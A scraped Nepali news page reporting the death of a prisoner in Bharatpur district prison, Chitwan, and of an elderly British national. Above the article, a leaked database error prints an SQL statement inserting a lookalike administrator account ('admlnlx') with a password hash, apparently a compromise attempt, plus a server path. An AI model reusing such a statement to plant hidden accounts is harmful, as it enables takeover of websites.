WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9yXtY6NRXUlQkcNsKLtHILcxDf97N.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 13:58:03', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
भरतपुर कारागारमा एक कैदीको मृत्यु – Gaule Khabar

भरतपुर कारागारमा एक कैदीको मृत्यु

भरतपुर कारागारमा  एक कैदीको मृत्यु

चितवन, माघ २० –

चितवनको जिल्ला कारागार भरतपुरमा एक कैदीको मृत्यु भएको छ । कैद भुक्तान गरिरहेका एक कैदीको आज बिहान मृत्यु भएको हो । नुवाकोट जिल्ला आरुखर्क–४ का २३ वर्षीय बादल शाहीको आज बिहान मृत्यु भएको जिल्ला कारागार चितवनका प्रमुख कमल काफ्लले जानकारी दिनुभयो । ब्रेन ट्यूमर भएका उनलाई क्यान्सर अस्पतालमा उपचारको लागी मङ्सिर २८ गते चितवन ल्याइएको थियो । चोरीलगायत विभिन्न मुद्दामा रु १८ लाख ८४ हजार जरिवाना तिर्न नसक्दा उनीलाई कैद सजाय भएको जनाइएको छ । उनको आफन्तलाई घटनाको जानकारी दिइसकेको र आफन्त आए पछि शव जिम्मा लगाएर पठाइने जिल्ला प्रहरी कार्यालय चितवनका प्रमुख दिपक थापाले जानकारी दिनुभयो ।
त्यस्तै चितवनमा आज एक विदेशी नागरिकको पनी मृत्युभएको छ । ७६ बर्षिय बेलायती नागरिक रोनाल आर्कलको आज मृत्यु भएको हो । असार यता चितवनमा नै बस्दै आएका उनी यहीँ माघ ७ गते अचेत भई भरतपुर अस्पतालमा उपचार गराइरहेका थिए । अत्याधिक मदिरा सेवनका कारण स्वास्थ्य बिग्रीएर उनी अस्पताल भर्ना भएको प्रहरीले जनाएको छ । उनको मृत्युको बारेमा बेलायती दुतावासलाई खबर गरिसकेको जिल्ला प्रहरी कार्यालयका प्रमुख दिपक थापाले जानकारी दिनुभयो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका